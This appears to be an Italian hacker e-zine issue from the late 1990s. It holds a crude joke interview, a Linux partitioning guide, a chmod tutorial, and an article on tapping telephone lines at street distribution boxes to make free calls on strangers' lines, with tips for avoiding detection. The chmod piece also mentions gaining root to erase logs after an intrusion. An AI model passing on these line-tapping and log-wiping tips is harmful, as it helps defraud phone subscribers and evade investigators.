²°ÛÛ°ÛÛ°°°°ÛÛ°ÛÛÛÛÛÛÛÛ°ÛÛÛÛÛ°ÛÛÛÛÛÛÛ°ÛÛ°°°°°°°ÛÛ°ÛÛ°ÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛ°²
²°ÛÛ°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ²²²ÛÛ°°ÛÛ°°°°°ÛÛ°°ÛÛ°ÛÛ°°°°°°°°°ÛÛ°°°°ÛÛ°°°°°°²
²°ÛÛ°ÛÛ°ÛÛ°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛ°ÛÛÛÛÛÛÛ°°°ÛÛ°°°ÛÛ°°°ÛÛ°ÛÛÛÛÛÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛ°°°²
²°ÛÛ°ÛÛ°°ÛÛÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°ÛÛ°°°°°°ÛÛ°ÛÛ°°°°ÛÛ°°°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°°°²
²°ÛÛ°ÛÛ°°°ÛÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛ°ÛÛ°°ÛÛÛ°°°°°ÛÛÛ°°°°°ÛÛ°ÛÛÛÛÛÛÛ°°°°ÛÛ°°°°ÛÛÛÛÛÛÛ°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ INTERVISTA AD UN PERFETTO ANONIMO ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Questa intervista Š dedicata alle mosche che ci stanno letterlamente
rompendo le balle e che inutilmente da un'ora cherchiamo di cattuare...

* Ciao a tutti oggi ci troveremo col nostro Anonimo di turno, allora zio che
si dice?
- Ma vaffansedere che caxxo mi stai facendo st'intervista. Valla a fare ad un
hacker...non a me!!!
* Allora quando hai iniziato la tua carriera di spogliarellista?
- Un paio di ani fa per necessita' fisiche...
* E ti e' piaciuto fin da subito?
- Certo l'idea di un mucchio di vecchiette che mi guardano ha sempre popolato
i miei sogni erotici...
* Cosa usi sempre per non lasciare tracce nelle tue vittime oltra ad uno
sputtanatissimo Wingate ??
- Mi preservo sempre...uso sempre Settebrutto...max aderenza
* Adesso cominciamo con le cose serie: quanti adepti hai formato? Perche' si sa
che accanto alla scuola di Hokuto primeggia la scuola di Taned con la mortale
mossa dei 7 log e dei 5 sniffer...
- La mia e' una azienda a conduzione familiare, Š una societ… a responsabilita'
estremamente limitata ( srEl )...
* Cosa ci puo' dire delle nuove evoluzioni del suo campo essendo proprio lei
uno dei fondatori della disiplina ormai nota come cyber-sesso?
- Bene il cyber-sesso si sta sempre + evolvendo...quando ripenso alle prime
zozzone che mi sono goduto mi viene una nostalgia....le ragazze di ieri erano
delle vere maiale mentre quelle di oggi sono solo delle frustrate che passano
il tempo a farsi leccare la figa dal barboncino che hanno in casa !
* Quanti computer hai a casa e cosa ci fai ??
- Allora....ne ho una decina...tra cui un paio di server Linux...uno Unix
ed un VAX/VMS d'epoca.....per• mi diverto molto con il mio pentium III
di produzione Microsoft a giocare con Flight Simulator..il miglior gioco
mai prodotto....ovviamente ho montato il fedele Windows 98...l'OS perfetto !
* Spiega in 5 righe come crakare un programma....
- 5 ??? sono troppe !!! astalavista.box.sk ---> crack+programma o anke
andare dal negoziante di fiducia e comperare il prodotto...facile no ?
* Che libri leggi di solito ???
- Allora il mio libro preferito Š sempre stato fin dall'et… di 5 anni
il libro intitolato "Necrofilia...oggi e ieri 2 realtÂ… a confronto"
me lo leggeva mia madre prima di addormentarmi...un altro libro
che mi ha molto colpito Š stato "Il sadomasochismo dalla A alla Z" che
segu ad una profonda rilettura del libro "Analit… profonda" dal
quale era stato tratto il film "Holly si fa HollywooD"
* Che canali frequenti ??
- #gay.it #piazzamelo_dietro #sukkia #checca.it #vienimi_dentro
#cappella_suck #sadomaso.it ect. ect. bei canali e bella gente....
ma mai come quei bei maschioni su #hackernow !!!!
*Che server hai bukato fino ad ora ???
-Mi sono comprato un bel trapano e con quello riesco finalmente a
bukare i server...unico inconveniente Š quello che non posso farlo
da remoto
*Che cosa ne pensi del panorama italiano dell'Hackin' ed affini ??
-Benissimo...mi piace molto il progetto portato avanti dagli Spaghetti
anke se non hanno ankora scoperto come non pagare le HotLine....
nel campo del Crackin' i ring0 la fanno da padroni....vorrei tanto
crackargli il pistolino.....nell'hackin' i + conosciuti sono i softpj
e gli spippolatori....che sarebbero capaci anke di bukarmi il sederino...
mettendoci dentro qualke rootkit e riuscendo a sniffarmi anke le scorregge
Poi...insomma sono tutti degli stalloni ideali no ???
*E di noi NewBies che ne pensi ???
-Bah....tutti ankora alle prime armi...vengono subito...al punto....
*Ti ringrazio molto della collaborazione e ci risentiremo appena sar•
capace di uscire dalla lugubrazione mentale + cupa in cui sei riuscito
a spingermi....(non fraintendete)
-Spero tanto che tu mi possa ripagare in natura....ma cmq non ci sono
problemi dato che o sarei andato in palestra con il mio amico Stallone
oppure mi sarei aCULturato sul news it.sesso.racconti arrivienerci
Bei figoni....

Note dell'intervistato:

Le balle crescono sempre di + a tutti e 2 e vi assicuro che non per una
sovrapproduzione di sperma ma per una rottura che cresce ogni minuto
a livello esponenziale...le balle sono piene...duke e quake non partono
in rete....'na Roba...il Nobo inizia anke a sclerare e gastemare i vari
cavetti e com.....basta scrivere.....passiamo ad altro...ci bekkiamo in
rete e, consiglio da amico, se vi chiedo di raccogliermi un passwd da
terra non vi piegate....potreste perdere la vostra verginita' anale.

bye
il vostro anonimo

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°ÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛÛÛÛ°°°ÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°²
²°°ÛÛ²²²ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°ÛÛ²²²²ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°²
²°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛ°°ÛÛÛÛÛ°°°°ÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛ°°°°ÛÛ°°ÛÛÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°²
²°°ÛÛ°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°ÛÛÛ°°°ÛÛ°°°°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°²
²°°ÛÛ°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛ°ÛÛ°°°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

TELECUM BruTe FORCIN'

Non penso di aver mai scritto un disclaimer ad un mio articolo
ma ora lo faccio...bisogna provare tutto no ???

Allora...se siete dei normali phreaker...credete a tutto quello
che ho scritto..ma se siete della Digos...della pula...della
madama...o anke vorreste tanto mettermi in gabbione, allora
dovete essere certi al 100% che tutto quello che scrivo
e' a titolo puramente informativo...che non ho mai utilizzato
tutte le tecniche sotto descritte (hihihi)...e che sono un
bastardissimo pischelletto.

Allora....la dedica...MMMmmmm non so se c'e' ne bisogno....
vabbe'....dai la scrivo....

ThiS Art. Is DeD 2 : MsBLiSs^ **My Sweethearth** & Adry **The MaMa**
+ in generale al canale in cui mi sbatto ogni
sera.... #cacca .. e non dite che e' un canale di
merda!!!! (irc.stealth.net - irc.tin.it)

And so the Vs-DeD is against : A colui che mi ha detto di riuscire
a crackare in linguaggio BINARIO !!!!!
(cavolo se lo sai fare veramente...sei
semplicemente un genio !!!!ahahahhaah)
LAMER schifoso!

Vi vorrei deliziare un poketto parlandovi del Forcin' delle varie
cabine e centraline....forse + in generale di cio' che un povero
comune mortale phreaker Italiano puo' fare per cercare di inkulare
il sistema verde bianco rosso.
Ovviamente se l'argomento non vi interessa siete pregati di non
leggervelo oppure di cancellarlo....oppure stamaparlo e pulirvici
il sederino.In definitiva non mi frega una mazzetta...fate quello
che vi pare...non siamo noi che parliamo sempre di Anarchy ??

Tutto quello di cui vi parlero' e' frutto di esperienza personale....
quindi se ve lo dico...credeteci...non sparo fregnate.Poi se non
ci volete credere...ripeto....a me ke mi frega ???

Passiamo all'articolo vero e proprio...
Io divido il TeleCum brute Forcin' in 3 possibili varianti

1-Cab forcin'
2-Street forcin'
3-House forcin'

Ora vi spieghero' con calma le affinita' e le differenze tra i 3 tipi
di forcin'.

Cab Forcing.

Beh sapete tutti che passeggiando per la strada vi capita di tanto in
tanto di imbattervi in degli affari di colore bianco e rosso con una
scritta del tipo TELECOM...quegli aggeggi frega soldi sono spesso
e volentieri chiamati cabine. (cazspita come sono colto!!!)
Le cabine che abbiamo qui' in Italia sono di 3 tipi:
Quelle vecchie solo a gettoni, quelle a gettoni ed a scheda e quelle
+ nuove che hanno un unico blocco e che possono leggere solo schede.
Da ora in poi sappiate che la mia esperienza si e' svolta su di una
cabina di tipo B cioe' scheda e gettoni.
Il cab forcin' consiste nel riuscire ad allacciarsi ad i cavi che
trasportano la linea alla cabina...facile no ???
Ed invece e' impossibile o quasi ed ora vi spiego perke' :

Bene....a parte il fatto che riuscire a trovare questi cavi e' una roba
a dir poko impossibile perke' i tecnici non sono dei fessi e non
lasciano mai i cavi scoperti, in + anke riusciendo a trovare questi
fili, a scuoiarli ed ad attacarvi un telefono, questi dopo un breve
fruscio, non dara' + segni di vita !!!!
Come mai ??? semplice...il segnale che arriva alle cabine e' codificato!
non e' lo stesso segnale che arriva a casa nostra!!!

________
|
| <-----ecco dove mi sono collegato io ! ( c'erano solo 2 fili )
| i cavetti che arrivano ad una cabina variano di numero
| possono essere 2 ma anke 4
|^^^^^^^^|
| ===== |
| |^| |
| | | |____
| | | | |
| _ ^ | == |
| |_| | |
| |____|
^^^^^^^^^^
Cammino per strada e cosa vedo ??? una cabina in cui i fili non erano
stati murati bensi' percorrevano un lungo tratto lungo il muro.
Cavolo per una volta i tecnici erano stati dei fessi...avevano lasciato
i cavi alla portata di tutti....eppure...cavolo avevano pensato anke a
questo. Dopo aver provato mille combinazioni...preso varie volte una
leggera scossa di 48V (una anke sulla punta del naso) ho deciso di
lasciar perdere....dentro alle cabine vi e' un particolare diodo preposto
alla decodificazione del segnale.
Dopo aver riattaccato con dello scotch trasparente i cavetti alla cabina
mi sono accorto che la cabina, che fino ad allora aveva lampeggiato
come una pazza, inviando kissa' quali segnali alla centralina che la logga,
aveva ripreso tranquillamente a fungere.
Abbiamo ripristinato il funzionamento della cabina solo in vista del
prossimo attacco in cui (speriamo) saremo in grado di decodificare il
segnale.

2-Street Forcing.

Beh questo...provato e riprovato + volte ha sempre sortito i suoi effetti.
Abbastanza facile come tecnica consiste nel trovare una di quelle centraline
da cui si dirama il segnale ad una intera zona della citta', aprirla
possibilmente senza fare troppo casino, e collegarvici il vostro caro
telefono da Phreaker ( tastierino...attacco per auricolari e microf. con 2 fili
che ne fuoriescono, in modo tale che sia il + piccolo il + maneggevole e
pratico possibile).
Questa tecnica vi assicuro che funge regolarmente, certo i consigli che vi posso
dare sono vari: non andateci sempre un determinato giorno della settimana,
non lo fate regolarmente ( use not abuse ), ogni volta che lo usate cambiate linea
e non preoccupatevi di prendere troppe precauzioni.
Con questa tecnica a dir poco infima, in quanto quello che viene fregato non
e' Mr. Telecom ma un normale utente, il sottoscritto e' riuscito finalmente a parlare
con la sua Net-girl-friend....alias MsBLiSs^. Ora vi direte...kakkio sei proprio
uno scorzone malefico...non avevi mai chiamato la tua net-girl-friend ???
Io prontamente vi rispondo...beh...se fosse stata qui' nella mia stessa citta' l'avrei
chiamata ogni giorno...se fosse stata in Italia l'avrei chiamata almeno una volta alla
setimana...ma poRco GateS...lei abita a Sidney in Australia !!!!!
Da casa non me la sentivo proprio di chiamare...(le bollette sono gia' salatissime)
dalla cabina con una scheda telefonica avrei parlato per max. 5 minuti....
ed allora cosa dovevo fare ???? hihihih in fondo erano solo 2.200 e' al min.
e ci ho parlato solo per qualke ora....e poi ero sulla linea di un supermercato.
E cosi' mi ritrovavo verso le 3 le 4 di notte..(il fuso mi aiutava)..seduto su di un
marciapiede...con un cappuccio in testa..con un freddo della madonna...con un
auricolare nell'orecchio ed un microfono vicino alla bokka...a parlare in Inglese
con una bottiglia di birra tra le gambe...(se si fosse avvicinato qualkuno avrebbe
pensato a me come un normale punkabbestia seduto per strada a scolarsi il suo
nettare e non mi avrebbe rotto le balle + di tanto).

_____________________
/___________________ /| Aperta la centralina vi ho trovato un
| | | parallelepipedo di questo genere al posto
| °° °° °° °° °° °° | | dei pallini vi erano delle viti che portavano
| °° °° °° °° °° °° | | la linea....(sempre 2 cavetti per linea)
| °° °° °° °° °° °° | |
| °° °° °° °° °° °° |/
^^^^^^^^^| ||^^^^^^^^
| ||
| |/

3-House Forcing.

Bene l'ho kiamato house forcin' perke' e' da farsi a casa altrui...
altrimenti lo avrei chiamato home forcin' giusto ???
e' molto simile allo street forcin' ma si differenzia nel fatto che non si
smonta nessuna cabina ma si agisce direttamente sui cavi che portano la linea
ad una casa...oppure direttamente su di una presa del telefono....
Questa tecninca personalmente l'ho usata solo un paio di volte..l'ho usata
a scuola nel nostro laboratorio di informatica dove il comp aveva un collegamento
ad internet ma la presa del telefono non consentiva l'attacco di una normale
presa maschio a 3 poli. Ho semplicemente smontato la presa..scuoiato
i cavetti ed attaccato il mio fedele telefono...semplice ed efficace...a parte
il fatto che mentre attaccavo i cavetti...beh...qualkuno ha avuto la malsana
idea di telefonare a scuola...mi e' squillato in mano....diciamo che lo squillo
mi e' arrivato fino al cervello...non erano + solo 48V !!!!

\\\\\\||||||||||||||//////
\\\\\||||||||||||||/////
\\\\||||||||||||||////
\\\||||||||||||||///
\\||||||||||||||//
\||||||||||||||/
^^^^^^^^^^^^^^ <-----Ecco come si presentava la mia
| 0 0 | faccia dopo la scossa
| / |e' (praticamente avevo i capelli di
| /_ | Diego Abatantuono stile old school)
| |
| () |
\__________/

Beh ora mi sono rotto e voglio uscire un po' di casa...sono le 20:01...
ora mi faccio una bella doccia mi vesto e poi sgommo...saluto tutti
quelli che conosco....il canale #hackernow gli SPP con l'enorme voglia
di reincontrarli presto e poi Nobody e ULNT..con la speranza che tornino
prestissimo.

Dante Alighieri

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°Û°°°°Û°ÛÛ°°°Û°Û°°Û°Û°°°Û°°°°°°Û°°Û°ÛÛ°°°Û°Û°Û°°°Û°°°°Û°°°°°°°Û°Û°°°°°ÛÛÛ°Û°²
²°Û°°°°Û°ÛÛÛ°°Û°Û°°Û°ÛÛ°ÛÛ°°°°°°Û°°Û°ÛÛÛ°°Û°Û°ÛÛ°ÛÛ°°°°°Û°°°°°Û°Û°Û°°°°Û°Û°Û°²
²°Û°°°°Û°Û°ÛÛ°Û°Û°°Û°°ÛÛÛ°°°ÛÛ°°Û°°Û°Û°ÛÛ°Û°Û°°ÛÛÛ°°°ÛÛ°°Û°°°Û°Û°°°Û°°°ÛÛÛ°Û°²
²°Û°°°°Û°Û°°ÛÛÛ°Û°°Û°ÛÛ°ÛÛ°°°°°°Û°°Û°Û°°ÛÛÛ°Û°ÛÛ°ÛÛ°°°°°°°Û°Û°ÛÛÛÛÛÛÛ°°ÛÛ°°Û°²
²°ÛÛÛÛ°Û°Û°°°ÛÛ°ÛÛÛÛ°Û°°°Û°°°°°°ÛÛÛÛ°Û°°°ÛÛ°Û°Û°°°Û°°°°°°°°Û°Û°°°°°°°Û°Û°Û°Û°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COME PARTIZIONARE L'HD X LINUX ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Allora, premetto prima di entrare nella parte "calda" dell'argomento ke io,
lo Z10-K41i (kalifornia) non sono assolutamente un hacker e skrivo
quest'artikolo essenzialmete a skopo educativo e quindi di eventuali
infortuni informatici io non sono direttamente ne indirettamente responsabile.
(sono responsabile solo se c'e lucro). ihih
Allora perke' skrivo quest'artikolo su liniz ?
Perke' un bel po' di tempo fa quando avevo bisogno di installare linuz nessuno
lo sapeva fare, anzi quelli ke mi cirkondano al massimo sanno kome si accende
un pc (alkuni nemmeno quello ).
Kome si installa questo benedetto linuzzzz? BHOOOOOOOOOOOOOOOO
Ci sono diverse strade da prendere :c'e' la strada brecciata e quella non la
faccio di skuro, c'e la strada statale, quella nemmeno c'e' il limite dei 50
km. e c'e la suprestr...............bastaaaaaaaaaa!!!!!!!!!!!! arrivo al sodo
c'e' l'autostrada ed e' quella ke far0'.

BANDO ALLE CIANCIE allora per installare linux e winkozza ci sono diversi
modi: quello teoriko sarebbe di fare una partizione primaria dos per winkozza,
una estesa non formattata non dos nativa per Linux (dove risiede il linuzzo)
e la partizione estesa non formattata di swap (ke serve al linux kome area di
swap) [ne sapete peggio di prima eeheh:))))]

Per fare tutto cio' senza tagliarvi potete usare partition magic (dove lo
trovate?) kiedetelo a me se proprio siete kosi' lamah!! Kome funzika ?
FATE A: --------> pmagic ---------> t (create a new partition) ---------> b
(beginning) per iniziare e vi fate la prima partizione windows quella primaria
dos.
Trovate poi tra le opzioni la scelta dello spazio residuo e lo prendete e poi
andate su opzioni e fate una partizione unformatted (letteralmente unformatted
kome skritto su partition magik).
Volete sapere la strada + corta per non fare errori ?[komincio a tagliare
senno' mi prendono le krisi] SSSSSSSSSSSSIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII ok.
Formattate tutto (la vostra famiglia pure se ne avete bisogno) e non fate
semplicemente nulla cioe' fate la partizione con fdisk (a pc formattato mi
rakkomando) kome partizione primaria e poi installate winzozzo !!!
E linuzz??????
E nattimo !! mo arriva pure lui....
prendete dopo aver fatto tutto cio' il solito Partizionatore magico e lo
mettete nel vostro lettore floppy........fate pmagcic e diko e tra le opzioni
avanzate troverete la vostra lettere r e cio' RESIZE metterete di quanto
volete farlo e il gioko e' fatto..
non farete altro ke ridimensionare (uaooo ke parolona) il vostro spazio per
la winkozza gia' installata .
Dopodike' andrete sul vostro BIOS e metterete il boot da cd (quello lo dovete
fare da soli senno' lasciate perde il pc e datevi alla peska di trote) e
quando metterete il vostro cd di linuz lui partira' farete enter.........
Quando arriverete al punto cruciale dove vi verranno mostrate le partizioni
presenti sul vostro pc e vedrete solo quella ridimensionata di winzozzo ne
farete kon lo stesso cd di linuz una native per lui e una swap mettendo nella
native il simboletto / .
Il gioko e' fatto !!! Ah dimentikavo il boot mettetelo nel Master Boot rekord
ok ??
:))))))))
Lo Z10 vi inkoraggia a fare prove prove e prove fino a ke' kon la vostra
ignoranza non riuscirete a mettere il benedetto linux.
Ma allora voi vi kiederete perke' proprio linux devo mettere per diventare un
newbies ?

Perke' Linux e' il sistema operativo + bakato e perke' i lameroni dei sys
penzano alle loro mogli e quindi lasciano tutto a voi

kapito ??????????????
Quindi gambe in spalla e provate provate provate se avete qualke probl io lo
zio sono su #hackernow e se non ci sono ci sono perzone in grado di aiutarvi
ugualmente.

CIAO a PResto.
A Hacker think different as a kracker!!!kali

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ccccccc hhh hhh mmm mmm oooooooo dd dd
ccc h h m mm mm m o o d dd
cc h h m mm mm m o o d dd
c hhhhhhh m mmmm m o o d dd
cc h h m mm m o o d dd
ccc h h m m o o d dd
ccccccc hhh hhh mmm mmm oooooooo dddd

...ovvero la gestione dei permessi su file e directory in linux e unix...

Allora quando mi e' stato commissionato questo articolo all'inizio ho parlato
con N0body88 e ho obbiettato con lui che tale articolo (nonostante fosse alla
mia portata) fosse troppo facile/scontato. Il ragionamento che mi ha fatto
lui allora mi ha fatto poi cambiare idea facendomi capire che anke le cose
facili x quanto stupide (come questo art) possono essere d'aiuto x chi non le
conosce che quindi giova dal fatto di poter avere un caz di art del caz col
quale cercare di capire una cosa x la quale altrimenti dovrebbe andare a
consultare un (quasiasi) manuale di *nix. Il mio nome e' EsPoNeNtIaL FoRcE e
sono felice di poter essere d'aiuto a qualcuno (ma lo saro'??). Si comincia...

1ø PUNTO: COME SI PRESENTA L'USCITA DEL COMANDO LS

Prima di tutto per cambiare i permessi dobbiamo sapere cosa sono e dove
trovarli, o meglio come vederli. Il nostro file system di *nix ci mostra
i vari file e directory con i loro attributi se usiamo il comune e conosciuto
comando "ls -l" che sta per long listing cioe' al postop del solito "ls" dove
ci vengono mostrati solo i nomi di file e directory con il nuovo modo di
usare ls (equivalente al comando dos "dir") possiamo visualizzare nuove e
(forse) sconosciute informazioni sui file in lista le cui caratteristiche
andremo subito a spiegare. Segue l'output di un semplice ls -al:

$ ls -l
total 1
-rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti
drwxrwxrwx 2 michele utenti 134 May 31 02:49 urlinteressanti

2ø PUNTO: COSA SIGNIFICANO I PERMESSI IMPOSTATI

Allora dai dati sopra scritti credo che siano intuibili quelli indicanti l'ora
e la data di ultim modifica dei file o directory, quelli riguardanti il nome
( e ci mancherebbe altro) ma cosa stanno a significare quelle stringe iniziali
"-rw-rw-rw-" e "drwxrwxrwx" ?
Dato che gli *nix sono sistemi multiutenti ogni utente puo' crearsi ed avere
i propri file ma come fa a non farli vedere e/o cambiare e/o cancellare dagli
altri utenti? Ed e' qui che entra in funzione il sistema dei permessi. Ad ogni
file e directory infatti (tra gli attributi) vi sono i permessi che si
presentano nella forma della colonna + a sinistra del ns esempio.
Direte voi...si vabbe ma che vogliono di che lo voi di??? E io: nu moment!!!
Allora la prima lettera dei permessi (che le 1ø caso manca e nel secondo e'
segnata con una "d") serve a farci capire se cio' che vediamo e' un file, una
dir, un simlink o un file speciale.

LETTERA SPIEGAZIONE
- sta ad indicare un semplice file
d sta ad indicare una directory normale
l sta ad indicare un collegamento simbolico, cioe' un simlink
b oppure c sta ad indicare un file speciale, utilizzato x controllare I/O
con periferiche

E le altre lettere direte voi??? Per le altre lettere tranquillizzatevi che
non vi sono molte opzioni come visto poc'anzi (anche se dovete ammettere che
non e' poi tanto difficile sto elenchetto da ricordare).
Per le rimanenti 9 posizioni sono divise in:

3 --> dedicate a cio' che puo' fare il possessore del file o della directory.
3 --> dedicate a cio' che possono fare gli appartenenti allo stesso gruppo
di cui fa parte l'utente possessore del gruppo.
3 --> dedicate a cio' che possono fare gli utenti che non sono il possessore
del file e che non fanno neanche parte delllo stesso gruppo del
possessore.

In ognuno di questi tre gruppi ovviamente la fanno da padroni rwx che stanno
a significare ripettivamente:

r = read = se e' attivo questo permesso si puo' leggere il file in questione.
w = write = se e' attivo questo si puo' modificare il file in questione via
editor o ridirigendo l'uscita.
x = execution = se e' attivo questo si puo' eseguire il file come un comando.

Questo per quanto riguarda i file, ma x quanto riguarda le directory? Eccoci:

r = read = se e' attivo indica che il soggetto in questione puo' analizzare
il contenuto della directory (es: con "ls")
w = write = se e' attivo l'utente puo' creare un file nella directory.
x = execution = se e' attivo l'utent puo' addentrarsi nelle sottodirectory
della directory che stiamo analizzando.

3ø PUNTO: COME CAMBIARE I PERMESSI

Adesso che avete capito come funzionano i permessi potete capire che se vi
loggate in una shell l'unico modo x cancellare il vostro ip e user dai log
e' quello di andare a modificare i log file che pero' hanno un piccolo
problemino... possono essere modificati solo dal root cioe l'amministratore
di sistema (l'aspirazione di ogni hacker in un sistema hackato) ed e' per tale
motivo che si rende necessario diventare root dopo essere entrato in un
sistema come utente proprio x aver il "permesso" tanto agognato per non poter
essere rintracciati e quindi puniti ;) Lo so che e' una cazzata e che il 99%
di voi lo sapeva gia' ma..xche' non dare una mano a chi e' nuovo e ha voglia
di imparare?
Cmq questa parte e' dedicata al modo in cui e' possibile cambiare il permesso
di uno o + file e/o directory ed e' questo che affronteremo vedendo l'uso del
comando "chmod" (change mode a intuizione (miii che genio!)).
Ovviamente voi potete cambiare solamente i diritti dei file di cui siete
proprietari, e se siete root potrete cambiare...tutto :D
Chmod funziona con un semplice schemetto qua sotto espresso:

chmod unodeitregruppi +/- unoopiudeiservizi nomefile

chmod g -w appunti

Spieghiamo innanzitutto come si intendono i 3 gruppi nel comando "chmod":

--> u = user = proprietario del file
--> g = group = utente facente parte dello stesso gruppo del proprietario
--> o = other = tutti gli altri

A questo punto quindi e' facile capire dall'esempio seguente:

$ ls -l
total 1
-rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti
$ chmod g -w appunti
$ ls -l
total 1
-rw-r--rw- 1 michele utenti 22 May 31 02:35 appunti
$ chmod g +w appunti
$ ls -l
total 1
-rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti

Se ne deduce quindi che con il segno + si attiva un servizio mentre col segno
- si toglie un servizio.
Allo stesso modo si possono cambiare servizi a tutti i tre gruppi:

$ ls -l
total 1
-rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti
$ chmod -w appunti
$ ls -l
total 1
-r--r--r-- 1 michele utenti 22 May 31 02:35 appunti
$ chmod +w appunti
$ ls -l
total 1
-rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti

Altrettanto facilmente si possono cambiare + servizi anke tra loro discordanti
perfino in + gruppi diversi. Esempio:

$ ls -l
total 1
-rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti
$ chmod go -w+x appunti
$ ls -l
total 1
-rw-r-xr-x 1 michele utenti 22 May 31 02:35 appunti
$ chmod go +w-x appunti
$ ls -l
total 1
-rw-rw-rw- 1 michele utenti 22 May 31 02:35 appunti

Il comando chmod puo' pero' essere passato con un argomento numerico che
indica la classe di utente e il diritto di accesso da cambiare come seguenza
di bit. Ma consiglio a chi non e' ancora pratico con la sintassi sopra usata
di cercare di capire bene il metodo sopra spiegato (o armeno c'ho provato) e
di avvicinarsi a tale metodo solo in seguito.

Per ulteriori notizie prima di chiamare l'amico smanettone provate a digitare
nel vostro linux "man chmod" e non lamentatevi perche cio' che c'e' e' in
inglese ma pregate dio (e i primi veri hackers) ogni gg per il fatto che ci
sia li' qualsivoglia voi ne abbiate bisogno...

Dedicato a N0bodY88 che mentre mi credevo migliore degli altri mi ha preso
da parte e mi ha fatto ricordare che anche io all'inizio avevo avuto qualcuno
al mio fianco che era pronto a risponderti alle 3 di notte su canali dal
nome mezzo mistico e mezzo fantasioso...

Direttamente dall'agglomerato

EsPoNeNtIaL FoRcE

Be CyBeRpUnK - CyBeRpUnK iS a StAtE Of mInD
Be HaCkEr - HaCkEr Is A sTaTe Of MiNd
AnD rEmEmBeR...u MuSt ThInk OnLy WiTh YoUr BrAin...SuRe...If U hAvE iT ;)

"Perche' faccio questo? perche' mi diverto. Il giorno che non mi divertiro'
piu' buttero' via il computer."

